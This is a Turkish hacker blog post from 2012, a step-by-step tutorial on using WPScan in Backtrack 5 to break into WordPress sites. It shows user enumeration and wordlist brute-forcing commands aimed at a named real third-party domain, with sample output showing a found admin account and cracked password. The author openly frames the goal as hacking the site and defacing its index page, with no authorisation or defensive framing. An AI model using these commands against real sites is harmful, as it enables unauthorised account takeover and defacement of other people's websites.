31 Ocak 2012 Salı

Backtrack 5 WPScan Kullanımı // Th4 MasK



Backtrack 5  WPScan Kullanımı.


Merhabalar. Ben Th4 MasK ,


Sizlere Kendi Anlatımım Olan WpScan Kullanımı Anlatıcam.


Şimdi Bununla Ne yapabiliriz Diyenler İçin Hemen Söyliyim ;


Bununla Brute Force Yaparak Sitelerin Açıgının BUlunması,Username Ve Password Bulunmasından Yardımcı olur.


Bir Nevi Siteyi Hacklemenin yarısından fazlasını geçmiş olursun Geriye kalan panele girip index atmaktir (:


Çok Konuştum Hemen Başlıyayım (:


İlk önce Terminal Açıyoruz.


cd /pentest/web/wpscan/ dileyim ve wpscan'mız karşımıza gelsin.


ruby wpscan.rb --h ile karşımıza nasıl kullanıcağımıza dair rapor Alabiliriz


ruby wescan.rb --url Victim ;


ruby wpscan.rb --url neovision.co.za  Bunu yaparsak Sitenin Hangi açıkla hackliyebiliceğimizi Bulabiliriz.


Ben size Şimdi Wpcan İle username Ve Password Bulmayı Göstericem..


Şunu Söylemek İsterimki Tabiki Bunu Atanılan wordlist'e bağlıdır ve Onunla İş yapılır. Wordlist ne kadar 
saglam olursa o kadar daha basitleştirir..


İlk Önce Sizlere Username Nasıl Ulaşıcagınızı Göstericem.


ruby wpscan.rb --url Victim --enumerate u ;


" ruby wpscan.rb --url neovision.co.za --enumerate u " bu kod ile username bulabilirsiniz. (Tırnak İşaretlirini Koymayınız )


Dedikten sonra Eğer Bulursa ; 


We found the following 1 username/s:


admin


Bu şekilde Görüceksiniz..


Sıra Geldi Pass Bulmaya ;


ruby wpscan.rb --url Victim --username Kullanıcıadı --wordlist Wordlist Yolu  ;


ruby wpscan.rb --url neovision.co.za --username admin --wordlist /pentest/passwords/wordlists/darkc0de.lst


Yukarıda Ben Wordlist Yerini /pentest/passwords/wordlists Bulunan darkc0de Listesini belirledim ve oradaki passları denicek


Tabiki Orada Siz Kendi Wordlist'nizide atıp Deniyebiliriz.


Hemen Bir Örnek Gösteriyim ;


tmp dizinine bir pass.txt veya wordlist.txt diye bir dosya açalım ve buraya bir kaç şifre ile dolduralım.


Şimdi Wordlistimizi Bu sitede Denicez şu şekilde ;


ruby wpscan.rb --url neovision.co.za --username admin --wordlist /tmp/pass.txt şeklinde..


Sonuçta Şu Şekilde Olucaktır. 


SUCCESS! Username : admin Şifre : 12345 Gibi..


Anlatıcaklarım Bu Kadardır Umarım Faydalı Olmuşumdur.


Th4 MasK ~ th4mask.blogspot.com
Bilinmezlik Diyarından
Gönderen zaman:
Etiketler: , , ,

Hiç yorum yok:

Yorum Gönder

Kaydol: Kayıt Yorumları (Atom)